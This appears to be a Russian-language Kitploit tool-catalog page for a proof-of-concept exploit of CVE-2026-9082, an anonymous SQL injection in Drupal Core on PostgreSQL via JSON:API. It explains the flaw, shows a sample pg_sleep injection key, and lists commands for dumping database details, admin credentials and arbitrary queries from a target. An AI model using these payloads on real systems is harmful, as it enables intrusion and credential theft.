Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-9082-Drupal-PoC — Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. Этический PoC для уязвимости Drupal, позволяющей анонимную SQL-инъекцию через модуль JSON:API на сайтах с PostgreSQL. | Kitploit
Инструменты/GitHubGitHub/7h30th3r0n3/cve-2026-9082-drupal-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub7h30th3r0n3/cve-2026-9082-drupal-poc

CVE-2026-9082-Drupal-PoC

Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. Этический PoC для уязвимости Drupal, позволяющей анонимную SQL-инъекцию через модуль JSON:API на сайтах с PostgreSQL.

Репозиторий
23413 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-9082 - PoC SQL-инъекции в Drupal Core (PostgreSQL)

Логотип Drupal


Обзор

Этот репозиторий содержит этическое подтверждение концепции (PoC) для CVE-2026-9082, критической уязвимости SQL-инъекции в Drupal Core, затрагивающей все сайты на PostgreSQL, работающие на Drupal с версии 8.0 по 11.3.9.

Ошибка находится в обработчике условий запроса сущностей PostgreSQL и может быть использована анонимными (неаутентифицированными) пользователями через модуль JSON:API, который включен по умолчанию, начиная с Drupal 9.

Официальное уведомление: SA-CORE-2026-004


Краткое описание уязвимости

Drupal Core включает API абстракции базы данных, предназначенный для очистки запросов и предотвращения SQL-инъекций. Ошибка в классе условий запроса сущностей, специфичном для PostgreSQL (core/modules/pgsql/src/EntityQuery/Condition.php), позволяет злоумышленнику внедрять произвольный SQL через управляемые пользователем ключи массива, передаваемые через параметры фильтра JSON:API.

  • Идентификатор CVE: CVE-2026-9082
  • Уведомление: SA-CORE-2026-004
  • Затронутое ПО: Drupal Core
  • Затронутые версии: 8.0.0 – 11.3.9 (только PostgreSQL)
  • Исправлено в: 11.3.10, 11.2.12, 10.6.9, 10.5.10
  • Серьезность: Критическая — 20/25 по шкале риска Drupal
  • Аутентификация: Не требуется (анонимно)
  • Воздействие: Утечка данных, повышение привилегий, удаленное выполнение кода в некоторых конфигурациях
  • Вектор атаки: HTTP — ключи массива условий фильтра JSON:API
  • Как это работает

    1. Метод translateCondition() в классе условий PostgreSQL перебирает $condition['value'] и использует ключи массива для создания имен PDO-плейсхолдеров:
      $where_id = $where_prefix . $key;
    2. JSON:API позволяет анонимным пользователям указывать значения фильтра с произвольными ключами массива через параметры URL:
      filter[x][condition][value][MALICIOUS_KEY]=val
    3. Именованные плейсхолдеры PDO состоят только из символов [a-zA-Z0-9_]. Когда ключ содержит ), PDO прекращает разбор имени плейсхолдера — все, что после, становится литеральным SQL, внедренным в запрос.
    4. Отправляя ключ, подобный 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--, злоумышленник закрывает предложение IN() и добавляет произвольный SQL, при этом привязка для :prefix_1 удовлетворяется легитимным ключом 1 в том же запросе.

    Ссылки и благодарности

    • Уведомление: SA-CORE-2026-004
    • Коммит исправления: ea9524d9
    • Обнаружитель: michaelmaturi (упомянут в уведомлении)

    Правовое уведомление

    Данный инструмент предназначен только для авторизованного тестирования безопасности, образовательных целей и этических исследований. Несанкционированный доступ к компьютерным системам является незаконным.


    Установка

    root@kitploit:~
    git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
    cd CVE-2026-9082-Drupal-PoC
    pip install requests rich

    Использование (CLI)

    root@kitploit:~
    # Check if target is vulnerable
    python3 CVE-2026-9082.py -u https://target.com --check
    
    # Extract PostgreSQL version
    python3 CVE-2026-9082.py -u https://target.com --version
    
    # Extract database info (user + db name)
    python3 CVE-2026-9082.py -u https://target.com --dbinfo
    
    # Extract Drupal admin credentials (uid=1)
    python3 CVE-2026-9082.py -u https://target.com --admin
    
    # List database tables
    python3 CVE-2026-9082.py -u https://target.com --tables
    
    # Custom SQL query extraction
    python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"
    
    # Use boolean-based extraction (faster but less reliable)
    python3 CVE-2026-9082.py -u https://target.com --version -m bool
    
    # Interactive mode (no arguments)
    python3 CVE-2026-9082.py

    Автор

    • PoC разработан 7h30th3r0n3
    • Уязвимость обнаружена michaelmaturi
    Скачать инструмент